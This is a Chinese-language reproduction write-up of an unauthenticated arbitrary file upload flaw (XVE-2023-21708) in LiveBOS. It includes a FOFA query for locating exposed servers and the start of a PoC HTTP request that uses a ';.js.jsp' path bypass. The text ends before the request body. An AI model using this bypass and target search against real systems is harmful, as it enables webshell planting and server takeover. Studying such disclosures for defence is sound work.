LiveBOS UploadFile.do 任意文件上传漏洞复现(XVE-2023-21708)_livebos漏洞

0x01 产品简介

LiveBOS（Live Business Object System）是顶点软件自主研发的以业务对象建模为核心的业务中间件及其集成开发工具，它通过业务模型建立直接完成软件开发的创新模式，支持各类基于WEB的专业应用软件与行业大型应用的开发。LiveBOS系统由三个相对独立的产品构成：运行支持支撑平台LiveBOS Server、开发集成环境LiveBOS Studio以及运维管理工具LiveBOS Manager。

0x02 漏洞概述

LiveBOS UploadFile.do 接口存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。

0x03 影响范围

福建顶点软件股份有限公司-LiveBos <= 3.9.0

0x03 复现环境

FOFA：

body="Power by LiveBOS"

0x04 漏洞复现

PoC

POST /feed/UploadFile.do;.js.jsp HTTP/1.1 
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
Connection: close
 
--